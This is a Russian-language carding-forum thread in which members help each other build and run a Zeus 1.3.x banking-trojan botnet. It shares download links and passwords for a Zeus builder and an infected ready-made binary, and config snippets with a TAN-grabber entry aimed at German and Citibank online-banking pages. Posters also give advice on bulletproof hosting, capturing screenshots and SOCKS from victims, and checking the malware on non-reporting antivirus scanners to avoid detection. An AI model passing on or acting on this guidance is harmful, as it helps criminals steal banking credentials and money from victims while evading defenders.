zeus 1.3.X.X своими руками

viens

Carder
Reaction score
39
Все подробности в моём видео мануале.
В архив положил все нужные программы + бинарник версии 1.3.3.5

Скачать: sendspace.com/file/ifolib
пароль: carder.market

---------- Сообщение добавлено в 11:00 PM ---------- Предыдущее сообщение размещено в 09:07 PM ----------

Ещё один момент. В версиях 1.3.X.X убран тан грабер (смотрите в истории версий).
Поэтому В файле конфига (когда делаем свой файл конфига и бинарник) убираем строчки:
(это не критично, но лишний мусор в файле конфига не нужен)

Code:
 entry "TANGrabber"
    "https://banking.*.de/cgi/ueberweisung.cgi/*" "S3R1C6G" "*&tid=*" "*&betrag=*"
    "https://internetbanking.gad.de/banking/*" "S3C6" "*" "*" "KktNrTanEnz"
    "https://www.citibank.de/*/jba/mp#/SubmitRecap.do" "S3C6R2" "SYNC_TOKEN=*" "*"
  end

Единственный момент - в примере выложен фейк версии 1.3, скорее всего это 1.2.4, т.к. не перехватывает firefox. Так что самостоятельно ищем на трекере бинарник 1.3.2. Остальное вроде всё норм, полёт нормальный, только у бота сменилось ID непонятно по какому принципу.

Единственный момент - в примере выложен фейк версии 1.3, скорее всего это 1.2.4, т.к. не перехватывает firefox. Так что самостоятельно ищем на трекере бинарник 1.3.2. Остальное вроде всё норм, полёт нормальный, только у бота сменилось ID непонятно по какому принципу.
Почему фейк? В истории версий я не видел, что бы zeus 1.3 грабил фф (если ток доп. модуль..нужно искать такие бинарники)
Автор решил поменять ID ботов в версиях 1.3 - зачем - мне лично не понятно, но..но наверно что то в этом есть))

Кто найдёт бинарники, кот. грабят фф - просьба выкладывайте тут))

Наконец-то большое Спасибо!) так как сижу на простом хосте денег нету ещё на абуз-хостинг меняю постоянно, поэтому бота надо на новый хост создавать)
как говорил так же можно было бы сдампить зуса 2.0, но там админка другая...

скоко пытался с 1.3.5.5 сделать vip не получлось) всёровно default

скоко пытался с 1.3.5.5 сделать vip не получлось) всёровно default

гык-гык)) смотри, в файле конфига есть:
Code:
entry "StaticConfig"
  ;botnet "btn1"
  timer_config 60 1
  .......
это ;botnet "btn1" замени на это botnet "vip" (это название бота, не более 4-х символов, ; точка с запятой блокирует использование названия..поэтому убери её)

страно и пробывал vip gold не получается) не зальёш плис свой cfg, а может проблема с билдером х3 меняю всёровно деф
,ещё тема 30 ботов появились)
и почему у меня ваще не где скрин шот не пашет хоть в нат не нат
возможно у меня веб скрипт с паблика и дрявый...

Last edited:
страно и пробывал vip gold не получается) не зальёш плис свой cfg, а может проблема с билдером х3 меняю всёровно деф
,ещё тема 30 ботов появились)
и почему у меня ваще не где скрин шот не пашет хоть в нат не нат
возможно у меня веб скрипт с паблика и дрявый...

vip gold - не пойдёт. я же писал - максимум 4-ре символа. их писать нужно слитно.

Насчёт скринов (иногда и соксов) я тебе скажу так - в 80% случаях зависит от параметров хоста (сервера), какой именно параметр отвечает за это - я точно не знаю. Но это факт. Попробуй сервак не на люнексе а на виндовсе.

Насчёт ботов. у меня левые стучали только тогда - когда я проверял свой exe-ник на АВ сервисах типа вирус тотал, вирус сенкс..проверяй всегда тут virtest.com. Стоит денег - за то левые боты потом не стучат и абузы не сыпяться.

• Like
Reactions: OVG
Please note, if you want to make a deal with this user, that it is blocked.
у меня наводящий вопрос, а чем дефолт от випа отличается? )) и кстати кто обещал видео выложить :P

у меня наводящий вопрос, а чем дефолт от випа отличается? )) и кстати кто обещал видео выложить :P

xDDD просто названием.
Видео можно скачать по ссылке, в первом посте.

+1! (хотя не смотрел видео, просто за труд).
у меня вопросы такие:
1. Вообше-то данный момет есть приватный Zeus? или уже вышел в паблик? (если есть приват, то пж, ссылка на сайт автора, цены или какая то инфа, чтоб понять разницу)
2. Spyеye не лучше Zeus ? довно думаю сделать ботнет на Spyeye, но никак не собираюсь.. кто не будь использует ?

музычка из детства :p
плюсег за труды. молодцом

ob00m тяжелое видимо у тебя детство было :) я так о таких вещах как зевс даже не знал, да и комп то первый увидел БК0010 еслиине ошибаюсь)))
а за труды тоже + не пожалею

Last edited:
ob00m тяжелое видимо у тебя детство было :) я так о таких вещах как зевс даже не знал, да и комп то первый увидел БК0010 еслиине ошибаюсь)))
а за труды тоже + не пожалею

это я о песенке, а не о зевсе :)
а детство было нештяк- бары, девки, драки :p

чё ещё не кто не нашёл бота который грабит фф?

Билд 1.3.3.0, работает с FF и win7.
hxxp://www.sendspace.com/file/0o9bc0
Антинуб пароль atom-128 encrypt: pxHknlQa0/CC

Zyklon, красавец всё таки нашёл протестил спасибо!

tonicooperi, не сбивай людей с толку, если не знаешь о чём речь идёт. Это не билдер, а уже готовый билд - чей-то (это не важно в нашем случае). Естественно он заражён - это же вирус. Почитай тему с самого начала и поймёшь в чём тут смысл этого билда.